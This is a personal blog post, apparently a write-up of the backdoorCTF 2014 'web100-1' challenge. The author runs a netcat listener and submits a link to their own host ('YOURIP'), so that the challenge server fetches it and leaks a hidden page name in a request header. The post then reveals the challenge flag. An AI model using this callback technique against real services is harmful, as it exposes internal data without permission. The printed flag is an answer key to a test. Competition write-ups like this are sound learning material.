Mehran's Boring Blog

daily so-called-technical experiences

Mehran's Boring Blog

daily so-called-technical experiences

I found myself publishing things, which may or may not be taken seriously.

Subject Categories

Sunday, 23 March 2014، 03:46 AM

۰

backdoorCTF 2014 - web100-1 writeup

Sunday, 23 March 2014، 03:46 AM
Of course the web server has to "fetch" the image file to rate it. Let's see the request, just fire up a netcat -lkv 54321 and submit the image link http://YOURIP:54321/. You should get something like:
listening on [any] 54321 ...
connect to [YOURIP] from backdoor.cognizance.org.in [128.199.215.224] 46845
GET / HTTP/1.1
Host: YOURIP:54321
Accept: */*
X-Referrer: 92702a9381515494689f5d14f85a83b7.php

OK, there's some interesting Referrer waiting for us. What if we tried to go the url? Ooops, that's a super secret page, containing the message By the way, the flag is f556b9a48a3ee914f291f9b98645cb02 commented in HTML.
Uppers ۰ Downers ۰ 14/03/23
Mehran

web

Comments (۰)

No Comments Yet

Leave Comment

ارسال نظر آزاد است، اما اگر قبلا در بیان ثبت نام کرده اید می توانید ابتدا وارد شوید.
شما میتوانید از این تگهای html استفاده کنید:
<b> یا <strong>، <em> یا <i>، <u>، <strike> یا <s>، <sup>، <sub>، <blockquote>، <code>، <pre>، <hr>، <br>، <p>، <a href="" title="">، <span style="">، <div align="">
تجدید کد امنیتی